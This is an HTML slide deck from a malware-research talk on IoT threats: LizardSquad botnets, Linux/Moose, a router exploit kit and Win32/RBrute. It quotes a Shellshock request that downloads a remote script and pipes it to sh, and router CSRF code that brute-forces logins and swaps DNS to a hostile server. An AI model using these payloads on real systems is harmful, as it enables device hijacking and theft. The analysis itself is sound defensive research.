-
Notifications
You must be signed in to change notification settings - Fork 15
/
internet-of-threats.html
349 lines (345 loc) · 43.5 KB
/
internet-of-threats.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Internet of {Things,Threats}</title><meta content="yes" name="apple-mobile-web-app-capable" /><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style" /><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui" name="viewport" /><link href="reveal.js/css/reveal.css" rel="stylesheet" /><link rel="stylesheet" href="reveal.js/css/theme/owasp.css" id="theme" /><link href="reveal.js/lib/css/zenburn.css" rel="stylesheet" /><script>document.write( '<link rel="stylesheet" href="reveal.js/css/print/' + ( window.location.search.match( /print-pdf/gi ) ? 'pdf' : 'paper' ) + '.css" type="text/css" media="print">' );</script></head><body><div class="reveal"><div class="slides"><section data-background-size="contain" data-background-image="images/hf/iot-hacker-lol.png"><h1>.</h1><p><small></small></p></section><section id="_iot_or_internet_of_things_threats"><h2>IoT or Internet of {Things,Threats}</h2><aside class="notes">but who are we?</aside></section>
<section id="_thomas_nyx_o"><h2>Thomas (@nyx__o)</h2><div class="ulist"><ul><li><p>Malware Researcher at ESET <span class="image" style="float: right"><img src="images/eset.png" alt="eset" width="300" /></span></p></li><li><p>CTF lover</p></li><li><p>Open source contributor</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Je m’appelle Thomas Dupuy, je suis Malware Researcher chez ESET.</p></li><li><p>J’aime passer du temps à résoudre des challenges d’ou ma participation a de nombreux CTFs.</p></li><li><p>J’essaye de contribuer à des projets Open Source autour du reverse engineering ou du malware.</p></li></ul></div></aside></section>
<section id="_olivier_obilodeau"><h2>Olivier (@obilodeau)</h2><div class="ulist"><ul><li><p>Security Researcher at GoSecure <span class="image" style="float: right"><img src="images/gosecure.png" alt="gosecure" width="300" /></span></p></li><li><p>Previously</p><div class="ulist"><ul><li><p>Malware Researcher at ESET</p></li><li><p>Infosec lecturer at ETS University in Montreal</p></li><li><p>Infosec developer, network admin, linux system admin</p></li></ul></div></li><li><p>Co-founder Montrehack (hands-on security workshops)</p></li><li><p>Founder NorthSec Hacker Jeopardy</p></li></ul></div></section>
<section id="_agenda"><h2>Agenda</h2><div class="ulist"><ul><li><p>About IOT</p></li><li><p>LizardSquad</p></li><li><p>Linux/Moose</p></li><li><p>Exploit Kit</p></li><li><p>Win32/RBrute</p></li><li><p>Conclusion</p></li></ul></div>
<aside class="notes"><div class="paragraph"><p>Notre agenda:
On va commencer avec LizardSquad des botnets de script kiddies qui ont fait coulé de l’encre.
En passant par Linux/Moose un animal étrange.
Suivant d’Exploit Kit et RBrute 2 types de menaces qui arrivent à changer le DNS des routeurs.
Pour finir par une conclusion et quelques conseils pour éviter la plupart de ces problemes.</p></div></aside></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/0.png" alt="0" /></div></div>
<aside class="notes"><div class="paragraph"><p>IOT sont des périphériques connecté
Partant d’une poele a cuisiner</p></div></aside></section>
<section data-background-size="contain" data-background-image="images/hf/1.png"><aside class="notes"><div class="paragraph"><p>A une ampoule electrique</p></div></aside></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/4.png" alt="4" /></div></div></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/3.png" alt="3" /></div></div>
<aside class="notes"><div class="paragraph"><p>en passant par des cafetiere qui permette de récupérer le mot de passe wifi</p></div></aside></section>
<section><div class="imageblock" style=""><div class="content"><img src="images/hf/2.png" alt="2" /></div></div>
<aside class="notes"><div class="paragraph"><p>ou des choses encore plus bizard</p></div></aside></section>
<section id="_why_it_matters"><h2>Why It Matters?</h2><div class="ulist"><ul><li><p>Hard to detect</p></li><li><p>Hard to remediate</p></li><li><p>Hard to fix</p></li><li><p>Low hanging fruit for bad guys</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>detect: no AV, interacts w/ outside network</p></li><li><p>remediate: no shell</p></li><li><p>fix: no vendor updates</p></li><li><p>low hanging fruit: easy to build botnet and no one cares</p></li></ul></div></aside></section>
<section id="_a_real_threat"><h2>A Real Threat</h2><div class="ulist"><ul><li><p>Several cases disclosed in the last two years</p></li><li><p>A lot of same-old background noise (DDoSer)</p></li><li><p>Things are only getting worse</p></li></ul></div></section>
<section data-background="images/headline-incapsula.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>mass scale</p></li></ul></div></aside></section>
<section data-background="images/headline-eset-rbrute.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>windows cross-infecting routers</p></li></ul></div></aside></section>
<section data-background="images/headline-cisco.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>targetting Cisco</p></li></ul></div></aside></section>
<section data-background="images/headline-eset-moose.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>some of ESET’s research</p></li></ul></div></aside></section>
<section data-background="images/headline-bbc-reincarna.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>quelqu’un s’est même tanné et a décider de nettoyer tous les routeurs</p></li></ul></div></aside></section>
<section data-background="images/headline-register-barbie.png" data-background-size="contain"><aside class="notes">and future targets</aside></section>
<section id="_wait_is_iot_malware_really_about_things"><h2>Wait, is IoT malware really about things?</h2></section>
<section id="_no_not_yet" data-background="#125F79"><h2>No. Not yet.</h2><aside class="notes"><div class="ulist"><ul><li><p>Affected yes but collateral dammage</p></li><li><p>so what is affected?</p></li></ul></div></aside></section>
<section data-background="images/hf/lots-of-routers.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>ou mieux représentés par ce qu’ils valent en terme de sécurité</p></li></ul></div></aside></section>
<section data-background="images/hf/electronic-waste.jpg" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>mais on comprends, pression du marché, etc.</p></li><li><p>reste que la situation devra changer</p></li><li><p>une question de temps avant le IoT at large (si ça continue)</p></li></ul></div></aside></section>
<section id="_so_what_kind_of_malware_can_we_find_on_such_insecure_devices"><h2>So what kind of malware can we find on such insecure devices?</h2></section>
<section id="_lizardsquad" data-background="#125F79"><h2>LizardSquad</h2></section>
<section data-background="images/hf/lizardsquad.jpeg" data-background-size="contain"></section>
<section id="_who_are_lizardsquad"><h2>Who are LizardSquad?</h2><div class="ulist"><ul><li><p>Black hat hacking group</p></li><li><p>Lots of Distributed Denial of Service (DDoS)</p></li><li><p>DDoS PlayStation Network and Xbox live in Christmas 2014</p></li><li><p>Bomb threats</p></li><li><p>DDoS for hire (LizardStresser)</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>6 of them were arrested in August</p></li></ul></div></aside></section>
<section id="_des_cyber_chenapans" data-background="#125F79"><h2>Des CYBER-CHENAPANS!</h2></section>
<section data-background="images/headline-krebs.png" data-background-size="contain"></section>
<section id="_the_malware"><h2>The Malware</h2><div class="ulist"><ul><li><p>Linux/Gafgyt</p></li><li><p>Linux/Powbot, Linux/Aidra, Kaiten, …​</p></li><li><p>Probably others, as source is public</p></li></ul></div></section>
<section id="_caracteristics"><h2>Caracteristics</h2><div class="ulist"><ul><li><p>Telnet scanner</p></li><li><p>Flooding: UDP, TCP, Junk and Hold</p></li></ul></div></section>
<section id="_some_server_code"><h2>Some Server Code</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code class="C language-C">"*****************************************"
"* WELCOME TO THE BALL PIT *"
"* Now with *refrigerator* support *"
"*****************************************"</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>with refrigerator support ;)</p></li></ul></div></aside></section>
<section id="_attack_vectors"><h2>Attack Vectors</h2><div class="ulist"><ul><li><p>Shellshock</p></li><li><p>SSH credentials brute-force</p></li><li><p>Telnet credentials brute-force</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>bruteforce avec une courte liste de weak pass</p></li></ul></div></aside></section>
<section id="_exemple_of_shellshock_attempt"><h2>Exemple of Shellshock Attempt</h2><div class="listingblock"><div class="content"><pre class="highlight"><code>GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: () { goo;}; wget -qO - http://o.kei.su/qn | sh > /dev/null 2>&1 &</code></pre></div></div></section>
<section id="_other_variants"><h2>Other Variants</h2><div class="ulist"><ul><li><p>HTTPS support</p></li><li><p>CloudFlare protection bypass</p></li></ul></div></section>
<section data-background="images/hf/cloudflare.png" data-background-size="contain"></section>
<section id="_sophisticated"><h2>Sophisticated?</h2><div class="ulist"><ul><li><p>LizardStresser database was leaked</p></li><li><p>Passwords in plaintext…​</p></li></ul></div></section>
<section id="_irc_command_and_control"><h2>IRC Command and Control</h2><div class="listingblock"><div class="content"><pre class="highlight"><code>------- Day changed to 08/25/15 -------
09:32 -!- There are 0 users and 2085 invisible on 1 servers
09:32 -!- 42 unknown connection(s)
09:32 -!- 3 channels formed
09:32 -!- I have 2085 clients and 0 servers
09:32 -!- 2085 2119 Current local users 2085, max 2119
09:32 -!- 2085 2119 Current global users 2085, max 2119</code></pre></div></div></section>
<section id="_bot_masters"><h2>Bot Masters</h2><div class="listingblock"><div class="content"><pre class="highlight"><code>12:56 -!- Topic for #Fazzix: 1k
12:56 -!- Topic set by void <> (Wed Aug 19 09:58:45 2015)
12:56 [Users #Fazzix]
12:56 [~void] [~void_] [@bob1k] [@Fazzix] [ Myutro]·
12:56 -!- Irssi: #Fazzix: Total of 5 nicks (4 ops, 0 halfops, 0 voices, 1 normal)
12:56 -!- Channel #Fazzix created Mon Aug 17 03:11:29 2015
12:56 -!- Irssi: Join to #Fazzix was synced in 2 secs</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>mostly gamer-related targets: DSLs, game hosting companies, …​</p></li></ul></div></aside></section>
<section id="_linux_moose" data-background="#125F79"><h2>Linux/Moose</h2></section>
<section id="_linux_moose_2"><h2>Linux/Moose</h2><div class="ulist"><ul><li><p>Discovered in November 2014</p></li><li><p>Thoroughly analyzed in early 2015</p></li><li><p>Published a report in late May 2015</p></li></ul></div></section>
<section id="_moose_dna"><h2>Moose DNA</h2><div class="paragraph"><p>aka Malware description</p></div>
<div class="paragraph small"><small>Hang tight, this is a recap</small></div>
<aside class="notes"><div class="paragraph"><p>gory details all in the report</p></div></aside></section>
<section id="_linux_moose_3"><h2>Linux/Moose…​</h2><div class="paragraph"><p>Named after the string "elan" present in the malware executable</p></div>
<div class="paragraph"><p><span class="image"><img src="images/elan-strings.png" alt="elan strings" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Lets get this out of the way.</p></div>
<div class="paragraph"><p>Elan2 is the file that is downloaded when the malware successfully spreads</p></div></aside></section>
<section id="_elan"><h2>Elan…​?</h2><div class="paragraph"><p><span class="image"><img src="images/moose-silly.jpg" alt="moose silly" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Moose, thus Linux/Moose was born</p></div>
<div class="paragraph"><p>But after the release of the whitepaper the Internet did some crowd-sourcing</p></div></aside></section>
<section id="_the_lotus_elan"><h2>The Lotus Elan</h2><div class="paragraph"><p><span class="image"><img src="images/lotus-elan.jpg" alt="lotus elan" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>And maybe the malware authors were nostalgic of the Lotus Elan</p></div>
<div class="paragraph"><p>or fan of a famous rock band near here…​</p></div></aside></section>
<section id="_elán"><h2>Elán</h2><div class="paragraph"><p>The Slovak rock band (from 1969 and still active)</p></div></section>
<section data-background-size="contain" data-background-image="images/Elan-slovak-rock-band.jpg"><aside class="notes">thanks Robert Lipovski for this less obvious
reference for a Canadian</aside></section>
<section id="_network_capabilities"><h2>Network Capabilities</h2><div class="ulist"><ul><li><p>Pivot through firewalls</p></li><li><p>Home-made NAT traversal</p></li><li><p>Custom-made Proxy service</p><div class="ulist"><ul><li><p>only available to a set of whitelisted IP addresses</p></li></ul></div></li><li><p>Remotely configured generic network sniffer</p></li></ul></div>
<aside class="notes"><div class="paragraph"><p>more serious note</p></div>
<div class="ulist"><ul><li><p>Via infected routers</p></li><li><p>None</p></li><li><p>Supporting both SOCKS and HTTP Proxying, listening on port 10073</p></li><li><p>Configured by the C&C server, sniff on all non /32 and non loopback interfaces</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/moose-scanner-threads.png"><aside class="notes"><div class="ulist"><div class="title">Worm-like behavior</div><ul><li><p>Tries to replicate via aggressive scanning</p></li><li><p>Will dedicate more resources to scan near current external IP</p></li><li><p>Will also scan on LAN interfaces</p></li><li><p>Will not reinfect an infected device</p></li><li><p>Can replicate across architectures</p></li><li><p>C&C is made aware of new compromises</p></li><li><p>Scans the internet on port 10073 (then 23), witnessed up to 35 threads
dedicated to scanning</p></li><li><p>MIPS and ARM</p></li><li><p>As you’ll see in the next diagram</p></li></ul></div></aside></section>
<section id="_attack_vector"><h2>Attack Vector</h2><div class="ulist"><ul><li><p>Telnet credentials bruteforce</p></li><li><p>Wordlist of 304 user/pass entries sent by server</p></li></ul></div></section>
<section id="_compromise_protocol"><h2>Compromise Protocol</h2><div class="paragraph"><p><span class="image"><img src="images/moose-infection-process.png" alt="moose infection process" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>C&C is active during a compromise.</p></div>
<div class="ulist"><div class="title">Advantages:</div><ul><li><p>specific binary for arch</p></li><li><p>can gather add. data</p></li></ul></div>
<div class="ulist"><div class="title">Disadvantage:</div><ul><li><p>If C&C is down, no further compromises happen</p></li></ul></div>
<div class="paragraph"><p>It spreads by finding routers (or devices) with weak or default credentials.</p></div></aside></section>
<section id="_anti_analysis"><h2>Anti-Analysis</h2><div class="ulist"><ul><li><p>Statically linked binary stripped of its debugging symbols</p></li><li><p>Hard to reproduce environment required for malware to operate</p></li><li><p>Misleading strings (getcool.com)</p></li></ul></div>
<aside class="notes"><div class="ulist"><div class="title">Packing several tricks</div><ul><li><p>Makes reverse-engineering tedious as the C library is mixed with malware code.</p></li><li><p>VM was not enough, for best results, we needed to be reachable from the Internet</p></li><li><p>Misleading strings resulted in bad domain takedown attempts by some</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/moose-components.png"><aside class="notes">in overview</aside></section>
<section id="_moose_herding"><h2>Moose Herding</h2><div class="paragraph"><p>The Malware Operation</p></div>
<aside class="notes"><div class="paragraph"><p>broad espionage and infiltration capability, what did they used it for?</p></div></aside></section>
<section id="_via_c_c_configuration"><h2>Via C&C Configuration</h2><div class="ulist"><ul><li><p>Network sniffer was used to steal HTTP Cookies</p><div class="ulist"><ul><li><p>Twitter: <code>twll</code>, <code>twid</code></p></li><li><p>Facebook: <code>c_user</code></p></li><li><p>Instagram: <code>ds_user_id</code></p></li><li><p>Google: <code>SAPISID</code>, <code>APISID</code></p></li><li><p>Google Play / Android: <code>LAY_ACTIVE_ACCOUNT</code></p></li><li><p>Youtube: <code>LOGIN_INFO</code></p></li></ul></div></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>The network sniffer was configured to steal cookies</p></li><li><p>Although the effectiveness of that approach is really debatable</p></li></ul></div></aside></section>
<section id="_via_proxy_usage_analysis"><h2>Via Proxy Usage Analysis</h2><div class="ulist"><ul><li><p>Nature of traffic</p></li><li><p>Protocol</p></li><li><p>Targeted social networks</p></li></ul></div></section>
<section data-background-size="contain" data-background-image="images/proxy-usage_traffic-nature.png"><aside class="notes"><div class="ulist"><ul><li><p>Blue: social network</p></li><li><p>Yellow: meta-botnet</p></li><li><p>Light blue: Other</p></li><li><p>As you can see there is no other traffic in the proxy except for social
network traffic and a tiny bit of operational traffic</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/proxy-usage_targets.png"><aside class="notes"><div class="paragraph"><p>To track, we followed some accounts we saw in the honeypot traffic</p></div></aside></section>
<section id="_an_example"><h2>An Example</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-1.png" alt="fraud example 1" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Allowed us to find a few profiles created by the operator such as this one.</p></div>
<div class="paragraph"><p>Pattern is < 50 follows per accounts</p></div></aside></section>
<section id="_an_example_cont"><h2>An Example (cont.)</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-2.png" alt="fraud example 2" /></span></p></div>
<aside class="notes">In the followed accounts</aside></section>
<section id="_an_example_cont_2"><h2>An Example (cont.)</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-3.png" alt="fraud example 3" /></span></p></div>
<aside class="notes"><div class="paragraph"><p>Same account went from 3k (and I believe that the scheme already started) to
11k with almost no posts</p></div>
<div class="paragraph"><p>From what I know about instagram, I expect a pattern like this to be really
rare (post / follower / following ratio)</p></div>
<div class="paragraph"><p>Several examples we found were not SFW. On a thin line between fitness and
porn. haha</p></div></aside></section>
<section id="_an_example_cont_3"><h2>An Example (cont.)</h2><div class="paragraph"><p><span class="image"><img src="images/fraud-example-4.png" alt="fraud example 4" /></span></p></div></section>
<section id="_anti_tracking"><h2>Anti-Tracking</h2><div class="ulist"><ul><li><p>Proxy access is protected by an IP-based Whitelist</p></li><li><p>So we can’t use the proxy service to evaluate malware population</p></li><li><p>Blind because of HTTPS enforced on social networks</p></li></ul></div>
<aside class="notes"><div class="ulist"><div class="title">Building on the anti-analysis tricks</div><ul><li><p>whitelist given by C&C</p></li><li><p>proxy service: port 10073</p></li><li><p>Pervasive use of HTTPS by social networks means we can’t track the operators’ actions through honeypots</p></li></ul></div></aside></section>
<section data-background-size="contain" data-background-image="images/operation_overview.png"><aside class="notes"><div class="ulist"><ul><li><p>Stolen cookies</p></li><li><p>Social network fraud</p></li><li><p>Reproduction</p></li></ul></div></aside></section>
<section id="_a_strange_animal"><h2>A Strange Animal</h2><div class="ulist"><ul><li><p>not in the DDoS or bitcoin mining business</p></li><li><p>no x86 variant found</p></li><li><p>controlled by a single group of actors</p></li></ul></div>
<aside class="notes">or seemingly controlled anyway</aside></section>
<section id="_status"><h2>Status</h2></section>
<section id="_whitepaper_impact"><h2>Whitepaper Impact</h2><div class="ulist"><ul><li><p>Few weeks after the publication the C&C servers went dark</p><div class="ulist"><ul><li><p>After a reboot, all affected devices should be cleaned</p></li><li><p>But victims compromised via weak credentials, so they can always reinfect</p></li></ul></div></li></ul></div>
<aside class="notes">Reboot: due to lack of persistence</aside></section>
<section id="_alive_or_dead"><h2>Alive or dead?</h2><div class="paragraph"><p><span class="image"><img src="images/port-10073-stats.png" alt="port 10073 stats" /></span></p></div>
<aside class="notes">Port 10073 activity</aside></section>
<section id="_yay_except"><h2>Yay! Except…​</h2><div class="paragraph"><p><span class="image"><img src="images/champagne-celebration.gif" alt="champagne celebration" /></span></p></div>
<aside class="notes"><div class="ulist"><ul><li><p>but of course things must happen to mess with your talk</p></li></ul></div></aside></section>
<section id="_linux_moose_update"><h2>Linux/Moose Update</h2><div class="paragraph"><p>New sample in September</p></div>
<div class="ulist"><ul><li><p>New proxy service port (20012)</p></li><li><p>New C&C selection algorithm</p></li><li><p>Few differences</p></li><li><p>Still under scrutiny</p></li></ul></div>
<aside class="notes"><div class="paragraph"><p>and we are careful, we don’t want to rely on strings ;)</p></div></aside></section>
<section><div class="paragraph"><p><span class="image"><img src="images/port-20012-stats_v2.png" alt="port 20012 stats v2" /></span></p></div></section>
<section data-background-size="contain" data-background-image="images/port-activity.png"></section>
<section id="_exploit_kit_targeting_routers" data-background="#125F79"><h2>Exploit Kit Targeting Routers</h2><aside class="notes"><div class="ulist"><ul><li><p>Les EK ont recement fait leur apparition sur la scène de l’embarqué.</p></li></ul></div></aside></section>
<section id="_exploit_kit_definition"><h2>Exploit Kit Definition</h2><div class="ulist"><ul><li><p>Automate exploitation</p></li><li><p>Targets browsers</p></li><li><p>Common exploits are Adobe and Java</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Comme le nom l’indique, ce sont des kits qui visent à automatiser l’exploitation de vulnérabilité.</p></li><li><p>Ils ciblent principalement les nagivateurs: Chrome, Firefox, IE et les plug-ins utilisés: Flash, Reader, Java.</p></li></ul></div></aside></section>
<section><div class="paragraph"><p><span class="image"><img src="images/hf/exploit-process.png" alt="exploit process" /></span></p></div>
<div class="exampleblock small"><div class="content"><div class="paragraph"><p>source: Malwarebytes</p></div></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Simplement comment fonctionne un EK.</p></li><li><p>Un utilisateur va naviguer sur des sites internet et tomber sur un site compromis.</p></li><li><p>L’EK va détecter les versions des logiciels de l’utilisateur.</p></li><li><p>Par exemple, quelle version de navigateur il utilise, quels plug-ins, quel OS?</p></li><li><p>Si l’utilisateur correspond a l’un des prés requis il va être redirigé, par une iframe par exemple vers l’exploit correspondant et exécute sans son approbation le code malicieux.</p></li></ul></div></aside></section>
<section id="_exploit_kit_in_action"><h2>Exploit Kit in Action</h2><div class="paragraph"><p><span class="image"><img src="images/hf/kafeine.png" alt="kafeine" /></span></p></div>
<aside class="notes"><div class="ulist"><ul><li><p>L’année dernière, Kafeine, un blogueur, a publié un article sur un des 1ers si ce n’est le 1er EK ciblant des routeurs.</p></li></ul></div></aside></section>
<section id="_exploit_kit_in_action_cont"><h2>Exploit Kit in Action (cont.)</h2><div class="ulist"><ul><li><p>Cross-Site Request Forgery (CSRF)</p></li><li><p>Uses default credential (HTTP)</p></li><li><p>Changes primary Domain Name System (DNS)</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Un Cross-Site Request Forgery or CSRF</p></li><li><p>Exécuter de code à travers une page HTML</p></li><li><p>Comment l’opérateur fait il cela?</p></li></ul></div></aside></section>
<section id="_exploit_kit_csrf"><h2>Exploit Kit CSRF</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code><html><head><script type="text/javascript" src="e_x.js"></script></head>
<body>
<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
<script language="javascript">
var pDNS = "37.139.50.45";
var sDNS = "8.8.8.8";
var passlist=["123456789","root","admin","qwerty","123456789","baseball","football","monkey","letmein","abc123","tata","<eopl>"];</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Voici un morceau de la CSRF utilisé.</p></li><li><p>Il définit le DNS primaire (malicieux)</p></li><li><p>Le secondaire qui comme on peut le remarquer correspond au DNS public de Google.</p></li><li><p>C’est dans l’optique de ne pas attirer l’attention si le DNS primaire ne répond pas.</p></li><li><p>Enfin la liste de mot de passe qui va tenter pour avoir un acces sur le routeur.</p></li></ul></div></aside></section>
<section id="_exploit_kit_how_to"><h2>Exploit Kit How-To</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code>function e_belkin(ip){
var method = "POST";
var url = "";
var data ="";
url="http://"+ip+"/cgi-bin/login.exe?pws=admin";
exp(url, "", "GET");
url="http://"+ip+"/cgi-bin/setup_dns.exe";
data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0";
exp(url, data, method);
}</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Suivant le modèle de routeur il va, soit faire un bruteforce, soit appeler une fonction spécifique au modèle</p></li><li><p>Par exemple, cette fonction est spécifique à certains modèles de la gamme Belkin.</p></li><li><p>Ici, il ne fait pas de bruteforce, il a déjà entré des creds</p></li><li><p>En dessous on voit la CSRF</p></li><li><p>C’est une requête POST dans laquelle il remplace le DNS primaire et secondaire par un DNS malicieux et légitime.</p></li></ul></div></aside></section>
<section id="_exploit_kit_continually_improved"><h2>Exploit Kit continually improved</h2><div class="ulist"><ul><li><p>Obfuscation</p></li><li><p>Exploits for CVEs</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>il a obfusqué son code et implémenté des exploits pour des CVEs.</p></li><li><p>L’obfuscation est le fait de produire un code difficile à comprendre.</p></li><li><p>Par exemple on peut renommer les variables par des suites de lettres et de chiffre n’ayant aucune signification.</p></li><li><p>Ou encore, implémenter une routine de déchiffrement.</p></li><li><p>Il chiffre son code avec de l’AES dans notre cas.</p></li></ul></div></aside></section>
<section id="_exploit_kit_cve"><h2>Exploit Kit - CVE</h2><div class="ulist"><ul><li><p>CVE-2015-1187</p></li><li><p>D-Link DIR-636L</p></li><li><p>Remote Command Injection</p></li><li><p>Incorrect Authentication</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Une autre amélioration est l’implémentation des exploits.</p></li><li><p>Une CVE est une vulnérabilité documentée portant un numéro et connue du grand public.</p></li><li><p>Un des exploits rajoutées dans l’EK cible la CVE-2015-1187 et affecte certain model de la gamme Dlink.</p></li><li><p>Elle permet d’exécuter du code à travers une commande à cause d’un défaut d’authentification.</p></li><li><p>D’autres exploits ciblent de beaucoup plus vieux bugs comme la CVE-2008-1244 qui est vieille de 7ans.</p></li><li><p>Si l’opérateur a pris du temps pour exploiter un aussi vieux bug, on peut aisément penser qu’il fonctionne plutôt bien.</p></li></ul></div></aside></section>
<section id="_recap"><h2>Recap</h2><div class="ulist"><ul><li><p>Exploit Kit</p></li><li><p>Change DNS</p></li><li><p>Fileless</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>On a un EK qui change le DNS du routeur, laisse aucun fichiers, multiplateforme</p></li><li><p>Qu’est ce qu’ils peuvent faire?</p></li></ul></div></aside></section>
<section id="_what_can_they_do"><h2>What Can They Do?</h2><div class="ulist"><ul><li><p>Universal XSS on all HTTP sites fetching Javascript on a 3rd party domain</p></li><li><p>Phishing</p></li><li><p>Adfraud</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Toutes les ressources que le navigateur va aller chercher en HTTP peuvent
être potentiellement remplacées au choix de l’attaquant</p></li><li><p>Généralement: phishing, adfraud</p></li><li><p>Quel script Javascript qui provient d’un tier pensez-vous est le plus
populaire?</p></li></ul></div></aside></section>
<section id="_you_said_adfraud"><h2>You Said Adfraud?</h2><div class="ulist"><ul><li><p>Injection via Google analytics domain hijacking</p></li><li><p>Javascript runs in context of every page</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Par exemple l’Injection via Google analytics domain hijacking</p></li><li><p>Le javascript des pages qui ont du Google analytics est remplacé par du javascript malicieux</p></li><li><p>En l’occurence injecter des iframes dans des pubs ou remplacer des pubs existantes par des pubs qui lui rapporte</p></li></ul></div></aside></section>
<section id="_exemple_of_google_analytics_substitution"><h2>Exemple of Google Analytics Substitution</h2><div class="listingblock oversize2"><div class="content"><pre class="highlight"><code>'adcash': function() {
var adcash = document.createElement('script');
adcash.type = 'text/javascript';
adcash.src = 'http://www.adcash.com/script/java.php?option=rotateur&r=274944';
document.body.appendChild(adcash);
},</code></pre></div></div>
<aside class="notes"><div class="ulist"><ul><li><p>Par exemple cette fonction lui permet de rajouter le javascript d’un tiers.</p></li></ul></div></aside></section>
<section data-background="images/hf/rbrute.png" data-background-size="contain"><aside class="notes"><div class="ulist"><ul><li><p>Quand on aborde les Malware il est difficile de ne pas parler de Windows.</p></li><li><p>Fin 2013 début 2014 notre collegue Benjamin a découvert un nouveau composant de Sality, Rbrute.</p></li><li><p>Pour rappel Sality est un botnet P2P envoyant principalement du spam.</p></li><li><p>Ce nouveau composant apporte au botnet un nouvel angle d’attaque à travers l’infection de routeur.</p></li><li><p>Ce composant a pour but d’infecter la machine avec le botnet</p></li></ul></div></aside></section>
<section id="_win32_rbrute_cont"><h2>Win32/RBrute (cont.)</h2><div class="ulist"><ul><li><p>Tries to find administration web pages (IP)</p></li><li><p>Scan and report</p></li><li><p>Router model is extracted from the realm attribute of the HTTP authentication</p></li></ul></div>
<aside class="notes"><div class="ulist"><ul><li><p>Rbrute va dans un 1er temps récupérer une liste d’ip à scanner du CnC.</p></li><li><p>Il va scanner ces IP et reporter ses trouvailles.</p></li><li><p>Il ajoute le modèle du routeur dans le rapport.</p></li><li><p>Pour trouver le modèle du routeur, il récupère le realm attribut du HTTP authentication.</p></li></ul></div></aside></section>
